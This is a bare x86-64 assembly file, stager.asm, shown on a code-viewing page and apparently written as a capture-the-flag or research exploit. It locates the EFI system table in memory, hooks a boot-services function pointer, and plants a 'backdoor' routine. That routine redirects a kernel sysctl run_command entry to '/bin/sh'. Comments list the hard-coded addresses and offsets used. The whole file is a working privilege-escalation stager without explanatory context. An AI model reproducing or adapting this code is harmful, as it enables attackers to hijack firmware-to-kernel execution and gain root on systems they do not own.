/..

#CONTENT

#TOP

stager.asmASM
   1 
 

   2 
 

   3 
 

   4 
 

   5 
 

   6 
 

   7 
 

   8 
 

   9 
 

  10 
 

  11 
 

  12 
 

  13 
 

  14 
 

  15 
 

  16 
 

  17 
 

  18 
 

  19 
 

  20 
 

  21 
 

  22 
 

  23 
 

  24 
 

  25 
 

  26 
 

  27 
 

  28 
 

  29 
 

  30 
 

  31 
 

  32 
 

  33 
 

  34 
 

  35 
 

  36 
 

  37 
 

  38 
 

  39 
 

  40 
 

  41 
 

  42 
 

  43 
 

  44 
 

  45 
 

  46 
 

  47 
 

  48 
 

  49 
 

  50 
 

  51 
 

  52 
 

  53 
 

  54 
 

  55 
 

  56 
 

  57 
 

  58 
 

  59 
 

  60 
 

  61 
 

  62 
 

  63 
 

  64 
 

  65 
 

  66 
 

  67 
 

  68 
 


    BITS 64
    DEFAULT REL

_start:
    push rax
    push rcx
    push rdx
    push rbx
    push rsp
    push rbp
    push rdi
    push rsi

    mov rax, 0x1e0ec018
    mov rdx, 0x5453595320494249
.find_system_services:
    cmp qword [rax], rdx
    je .found
    add rax, 0x100000
    jmp .find_system_services

.found:
    mov rax, qword [rax + 0x60]
    mov rdx, qword [rax + 0xe8]
    mov qword [rel original], rdx
    lea rdx, [rel backdoor]
    mov qword [rax + 0xe8], rdx

    pop rsi
    pop rdi
    pop rbp
    pop rsp
    pop rbx
    pop rdx
    pop rcx
    pop rax
    ret
original: dq 0
backdoor:
    push rax
    push rdx

    ;;; location of run_command sysctl structure
    mov rax, 0xc00000 + 0x1a0cb60
    ;;; virtual address of /bin/sh string
    mov rdx, 0xffffffff81ce8cc6
    mov qword [rax + 0x08], rdx

    pop rdx
    pop rax
    jmp qword [rel original]

; system table
; 0x1e5ec018
; 0x1e7ec018
; 0x1e7ec018
; 0x1e9ec018
; bzImage
; 0x15247ceb
; run_command string
; 0x28fcfdf
; kernel base
; 0x28fcfdf - 0x1cfcfdf
; = 0xc00000
; kern_table offset
; 0x1a0cb60
; sysctl_run_command offset
; 0x24a9360